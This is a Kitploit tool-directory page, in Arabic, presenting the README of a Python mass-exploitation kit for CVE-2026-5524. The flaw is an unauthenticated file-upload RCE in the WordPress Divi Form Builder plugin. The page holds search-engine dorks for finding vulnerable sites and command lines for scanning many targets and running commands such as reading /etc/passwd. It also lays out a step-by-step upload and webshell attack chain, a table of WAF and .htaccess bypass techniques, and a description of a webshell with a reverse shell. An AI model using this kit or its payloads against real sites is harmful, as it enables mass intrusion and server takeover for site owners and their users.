Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5524-PoC — مجموعة أدوات استغلال جماعي بلغة Python لـ CVE-2026-5524، وهي ثغرة تنفيذ أوامر عن بُعد عبر رفع ملفات دون مصادقة في إضافة Divi Form Builder الخاصة بـ WordPress، مع رفع webshell وتنفيذ الأوامر. | Kitploit
أدوات/GitHubGitHub/iicaicai/cve-2026-5524-poc
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتتجاوز WAFأمن الويباختبار الاختراقالفريق الأحمرتطوير الحمولاتحصان طروادة للوصول عن بعد
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

مجموعة أدوات استغلال جماعي بلغة Python لـ CVE-2026-5524، وهي ثغرة تنفيذ أوامر عن بُعد عبر رفع ملفات دون مصادقة في إضافة Divi Form Builder الخاصة بـ WordPress، مع رفع webshell وتنفيذ الأوامر.

عرض المستودع

CVE-2026-5524 — تنفيذ تعليمات برمجية عن بُعد (RCE) غير مُصادق عليه في Divi Form Builder

مجموعة أدوات استغلال جماعي لـ CVE-2026-5524، وهي ثغرة رفع ملفات عشوائية غير مُصادق عليها في إضافة WordPress Divi Form Builder <= 5.1.8 تؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

version Devon Aji python telegram

الحقلالقيمة
CVE2026-5524
CVSS9.8 (حرجة)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المتأثرDivi Form Builder <= 5.1.8
المُصحَّح5.1.9
النوعرفع ملفات غير مُصادق عليه يؤدي إلى RCE
الباحث0xd4rk5id3 - EnvoraSec

المحتويات

  • الوصف
  • Dorks
  • التثبيت
  • الاستخدام
    • هدف واحد
    • استغلال جماعي
    • تجاوز متقدم
    • تنفيذ الأوامر
  • تفاصيل الثغرة
  • تقنيات التجاوز
  • التقنيات المستخدمة
  • هيكل المشروع
  • مسار الهجوم
  • إخلاء المسؤولية

الوصف

تحتوي إضافة Divi Form Builder لـ WordPress على ثغرة رفع ملفات عشوائية غير مُصادق عليها. يمرر المعالج do_image_upload() المعامل acceptFileTypes المُتحكَّم فيه من المستخدم مباشرةً إلى تعبير نمطي (regular expression) يُستخدم للتحقق من امتدادات الملفات. من خلال توفير قيمة مثل phtml، يمكن للمهاجم تجاوز قاعدة .htaccess الخاصة بالإضافة التي تحظر امتداد .php فقط ورفع webshell بامتداد قابل للتنفيذ بـ PHP (.phtml، .phar، .php5، .php7، وما شابه ذلك).

بمجرد وصول الملف إلى /wp-content/uploads/de_fb_uploads/، ينفذه Apache كـ PHP، مما يمنح المهاجم تنفيذ تعليمات برمجية عن بُعد بصلاحيات مستخدم خادم الويب.

تم إصلاح المشكلة في Divi Form Builder 5.1.9.


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

التثبيت

المتطلبات: Python 3.8 أو أحدث على Linux أو macOS أو WSL.

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

الاستخدام

هدف واحد

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

استغلال جماعي

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

تجاوز متقدم

للأهداف الواقعة خلف WAF (NinjaFirewall، Wordfence، ModSecurity) أو ذات إعدادات Apache أو nginx مُحصَّنة.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

تنفيذ الأوامر

بعد نجاح الرفع، يمكن للسكربت تنفيذ أمر فورًا أو الدخول إلى shell تفاعلي.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

الخيارات


تفاصيل الثغرة

الكود المصاب

يبني المعالج المصاب تعبيرًا نمطيًا من مدخلات المستخدم دون تعقيم.

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

بإرسال acceptFileTypes=phtml، يصبح التعبير النمطي الناتج /\.(phtml)$/i مطابقًا لأسماء الملفات المنتهية بـ .phtml، حتى مع أن ملف .htaccess الخاص بالإضافة يحظر امتداد .php فقط. ثم ينفذ Apache الملف المرفوع كـ PHP، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

سلسلة الهجوم المؤكدة

  1. قم بزحف صفحة تتضمن نموذج Divi Form Builder (/، /contact، /quote، إلخ). أضف معامل ?nocache=<random> للتغلب على Varnish و WP Rocket وذاكرات التخزين المؤقت الأخرى للصفحات التي قد تقدم nonce قديمًا.

  2. استخرج قيمة fb_nonce من كائن JavaScript المُترجم:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. أرسل POST بنموذج multipart إلى /wp-admin/admin-ajax.php مع:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. اقرأ عنوان URL للملف من استجابة JSON:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. اطلب الـ shell بأمر مُرمَّز بـ base64:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

تقنيات التجاوز

يجرب السكربت كل تقنية بترتيب الأولوية، وعند تفعيل --aggressive، يحاول كل واحدة حتى بعد أن يُبلّغ الرفع الأول عن النجاح.


التقنيات المستخدمة

سكربت الاستغلال

الـ shell المخصص (bypass.phtml)


هيكل المشروع

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Main exploit script
|-- bypass.phtml              16 KB multi-layer PHP webshell
|-- htaccess_enable.phtml     Dropper that writes a re-enabling .htaccess
|-- user_ini.phtml            Dropper that writes a .user.ini for PHP-FPM
|-- targets.txt               Example target list
|-- pwned.jsonl               Generated by the -o flag during mass scans
|-- requirements.txt          Python dependencies
`-- README.md                 This document

مسار الهجوم

root@kitploit:~
+--------------------------------------------------+
| 1. Recon                                         |
|    GET /?nocache=<random>                        |
|    Parse fb_nonce from de_fb_obj                 |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Craft exploit                                 |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Server accepts and stores file                |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Execute                                       |
|    GET shell.phtml?x=base64(command)             |
|    Remote code execution achieved                |
+--------------------------------------------------+

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية وللاستخدام أثناء مهام اختبار الاختراق المصرح بها. تشمل أمثلة الاستخدام المقبول ما يلي:

  • برامج مكافآت الثغرات التي تصرح صراحةً باختبار الهدف
  • مسابقات Capture the flag وبيئات المختبرات المخصصة
  • تقييمات الأمن الداخلي بإذن كتابي من مالك الأصل
  • البحوث الأمنية الأكاديمية التي تُجرى في بيئة مُتحكَّم بها

يُعد الاستخدام غير المصرح به ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا صريحًا لاختبارها غير قانوني في كل ولاية قضائية تقريبًا ومحظورًا تمامًا. لا يُقرّ المؤلف ولا يتحمل مسؤولية إساءة استخدام هذا الكود.

J'ai la permission et je suis autorisé à effectuer ce pentest. (لدي الإذن وأنا مصرح لي بإجراء اختبار الاختراق هذا.)

تشمل القوانين ذات الصلة المحتملة قانون UU ITE الإندونيسي، وقانون الاحتيال وإساءة استخدام الحاسوب الأمريكي، واتفاقية الجريمة الإلكترونية للاتحاد الأوروبي، والتشريعات المكافئة في أماكن أخرى. عند الشك، احصل على إذن كتابي أولًا.


الترخيص

للاستخدام التعليمي فقط. راجع قسم إخلاء المسؤولية للاطلاع على شروط الاستخدام الكاملة.

تنزيل الأداة
الخيارالوصف
-u URLعنوان URL لهدف واحد
-l FILEملف يحتوي على قائمة الأهداف، عنوان URL واحد لكل سطر
-t Nعدد الخيوط المتزامنة (افتراضي 10)
--timeout Nمهلة الطلب بالثواني (افتراضي 15)
-o FILEحفظ النتائج في ملف إخراج JSONL
--proxy URLتوجيه حركة المرور عبر بروكسي HTTP
--nonce HASHاستخدام nonce مُقدَّم يدويًا، وتخطي الاكتشاف التلقائي
--ext EXTفرض امتداد واحد بدلًا من قائمة التجاوز الكاملة
--shellالدخول إلى shell تفاعلي لـ RCE عند النجاح (هدف واحد فقط)
--cmd CMDتنفيذ أمر واحد على الهدف، ثم الخروج
--shell-file FILEرفع حمولة shell مخصصة بدلًا من المدمجة
--no-verifyتخطي خطوة التحقق من RCE بعد الرفع
--strict-verifyتأكيد أن عنوان URL للـ shell يُرجع HTTP 200 لتصفية الإيجابيات الكاذبة
--user-iniرفع dropper لـ .user.ini لبيئات PHP-FPM
--htaccessرفع .htaccess لإعادة التمكين لبيئات Apache
--aggressiveتمكين كل تقنية تجاوز متاحة
--null-byteتضمين محاولات null byte والامتداد المزدوج
--path-traversalمحاولة الرفع إلى أدلة فرعية /uploads/YYYY/MM/
--debugطباعة استجابات HTTP الخام للتشخيص
#التقنيةالأهداف
1امتدادات PHP بديلة .phtml، .phar، .php5، .php7، .php4، .pht، .shtmlقاعدة .htaccess الخاصة بالإضافة التي تحظر .php فقط
2تغيير حالة الأحرف .PHTML، .PHP5، .PhTmLتوقيعات WAF الحساسة لحالة الأحرف (NinjaFirewall)
3الامتداد المزدوج .phtml.jpg، .php.jpgسلوكيات التفاوض على المحتوى في Apache mod_mime
4null byte .php%00.jpg، .phtml%00.txtإصدارات PHP القديمة (أقل من 5.3.4) وبعض المحللات
5مسافة أو نقطة زائدة .php ، .php.Windows IIS وإصدارات Apache الأقدم
6تزييف Content-Type application/octet-streamجدران WAF التي تعتمد على ترويسة Content-Type في multipart
7رفع .htaccess حقيقي يعيد تمكين PHP لـ .gif، .png، .jpg، .txt، .html، إلخ.خوادم Apache مع AllowOverride All
8رفع .user.ini مع auto_prepend_fileبيئات PHP-FPM
9حقن اسم الملف عبر التلاعب بحدود multipartالبروكسيات وجدران WAF التي تعيد تحليل جسم الطلب
10اجتياز المسار ../shell.phtml في اسم الملفقيود دليل الإضافة
المكوّنالتقنية
اللغةPython 3.8+
عميل HTTPrequests
معالجة TLSurllib3 في الوضع غير الآمن للشهادات الموقعة ذاتيًا
التزامنconcurrent.futures.ThreadPoolExecutor للفحص الجماعي
التحليلre لاستخراج nonce، json لمعالجة الاستجابات
الترميزbase64 لمعامل أمر webshell
CLIargparse مع 19 خيارًا قابلًا للتهيئة
المكوّنالتقنية
اللغةPHP 7.0+
دوال التنفيذsystem()، shell_exec()، proc_open()، passthru()، popen()
الواجهة الأماميةنموذج HTML بسيط، بدون إطار عمل JavaScript
الميزاتمتصفح ملفات، تنفيذ أوامر، الوصول إلى قاعدة البيانات، reverse shell، تثبيت ذاتي لـ .htaccess و .user.ini
الحجمحوالي 16 KB
طبقات التجاوزستة مسارات تنفيذ مستقلة بالإضافة إلى حمولات مُرمَّزة